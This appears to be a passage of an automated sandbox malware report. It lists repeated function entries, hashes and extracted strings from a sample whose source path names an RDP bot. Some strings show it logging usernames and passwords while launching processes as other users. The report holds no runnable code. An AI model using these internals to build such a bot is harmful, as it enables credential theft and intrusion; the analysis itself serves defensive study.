                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction ID: b86c9df7f7d8c00c1de3fd7fae0b5c9d88931ac29f3a9f4d1ff10f1936957d94
                    • Opcode Fuzzy Hash: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction Fuzzy Hash: D9F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF7048947D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction ID: 4f51eaf12c252f14d2e814458be1617bc15ec2ecf4b6497148fa16afbf635ced
                    • Opcode Fuzzy Hash: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction Fuzzy Hash: D1F03013B0DA0341F956AE467C80BB991412F81BA5E8D0D358D5C0A6C1AF7D7CA38320
                    Function 00007FF7048947C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction ID: 66093d1820e0408654188f5ce1ba275629a297463c1ead15727bf940c226423b
                    • Opcode Fuzzy Hash: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction Fuzzy Hash: A4F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF7048947BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction ID: 471b3bff0586ec136dc95a8933df64422d513b9a2d9e2133d451bacefe279388
                    • Opcode Fuzzy Hash: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction Fuzzy Hash: 62F03A13B0DA0341F956AE46BC81BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction ID: a595b5299544ebb49fcf8a75d1f21148fd12d68bd1de30331cc1e1ce6760566c
                    • Opcode Fuzzy Hash: e4515d24f520ce7de176e247dfece73cf68b1250ec6576f9dcf6ba3ae7f22860
                    • Instruction Fuzzy Hash: 45F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D368D5C0A6C1AF7DBCA38320
                    Function 00007FF704894771 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction ID: 471b3bff0586ec136dc95a8933df64422d513b9a2d9e2133d451bacefe279388
                    • Opcode Fuzzy Hash: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction Fuzzy Hash: 62F03A13B0DA0341F956AE46BC81BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894767 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction ID: 2bf27b2ae6d6eec0c27612c2c8fc7362068cfee71c6fc820ee6dd9d7b4cc56f9
                    • Opcode Fuzzy Hash: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction Fuzzy Hash: 1BF03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF70489475D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction ID: b86c9df7f7d8c00c1de3fd7fae0b5c9d88931ac29f3a9f4d1ff10f1936957d94
                    • Opcode Fuzzy Hash: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction Fuzzy Hash: D9F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894B8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: f9c19ecb0dbcd0404074f8f279659e2043fc8fa528e26d34917970762c54e7d8
                    • Instruction ID: 4fdad4b5155460b22580d3c72f4303fa82476ceb43c86d012619b91e94a204a4
                    • Opcode Fuzzy Hash: f9c19ecb0dbcd0404074f8f279659e2043fc8fa528e26d34917970762c54e7d8
                    • Instruction Fuzzy Hash: 39F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D328D5C0A7C1AF7DBCA38320
                    Function 00007FF704894785 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction ID: 4f51eaf12c252f14d2e814458be1617bc15ec2ecf4b6497148fa16afbf635ced
                    • Opcode Fuzzy Hash: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction Fuzzy Hash: D1F03013B0DA0341F956AE467C80BB991412F81BA5E8D0D358D5C0A6C1AF7D7CA38320
                    Function 00007FF70489477B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction ID: 66093d1820e0408654188f5ce1ba275629a297463c1ead15727bf940c226423b
                    • Opcode Fuzzy Hash: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction Fuzzy Hash: A4F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction ID: 2bf27b2ae6d6eec0c27612c2c8fc7362068cfee71c6fc820ee6dd9d7b4cc56f9
                    • Opcode Fuzzy Hash: 61536f64e2f8ffc8f51db8786fdea12ce0a1234ad630e6579192e398d01fd7e8
                    • Instruction Fuzzy Hash: 1BF03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894868 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction ID: b86c9df7f7d8c00c1de3fd7fae0b5c9d88931ac29f3a9f4d1ff10f1936957d94
                    • Opcode Fuzzy Hash: d09cfe2e7f27015ffce74da7658019a43f43db689c1ca60bcd7ebf9e5b6c6232
                    • Instruction Fuzzy Hash: D9F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF704894890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction ID: 4f51eaf12c252f14d2e814458be1617bc15ec2ecf4b6497148fa16afbf635ced
                    • Opcode Fuzzy Hash: f4da63c4789cf217afe351ff4f6dd43b543261fbf7b8fdb04ee6528f7bd42f17
                    • Instruction Fuzzy Hash: D1F03013B0DA0341F956AE467C80BB991412F81BA5E8D0D358D5C0A6C1AF7D7CA38320
                    Function 00007FF704894886 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction ID: 66093d1820e0408654188f5ce1ba275629a297463c1ead15727bf940c226423b
                    • Opcode Fuzzy Hash: 66188fbad683bb74668b27566d1f38c8e5cf3bb503f2bc2aca81d20f34e51556
                    • Instruction Fuzzy Hash: A4F03A13B0DA0341F956AE46BC80BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320
                    Function 00007FF70489487C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction ID: 471b3bff0586ec136dc95a8933df64422d513b9a2d9e2133d451bacefe279388
                    • Opcode Fuzzy Hash: 16974e12e65d0088ddd2aef65ce91995e315f23da78915dcd85e6b3e4ba2f098
                    • Instruction Fuzzy Hash: 62F03A13B0DA0341F956AE46BC81BB992412F81BA5E8D0D358D5C0A6C1AF7DBCA38320

                    Non-executed Functions

                    Function 00007FF70489292E Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                    • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                    • API String ID: 1842180197-3127737957
                    • Opcode ID: 2fad34b6e60e7e93003f52f53a8c878be0b46599dbd7b18018c2520e3bcecbd4
                    • Instruction ID: 28bd793a4a1bb066b7dd8ecbdd451976ec41fe2318122e41446cc32f2362734c
                    • Opcode Fuzzy Hash: 2fad34b6e60e7e93003f52f53a8c878be0b46599dbd7b18018c2520e3bcecbd4
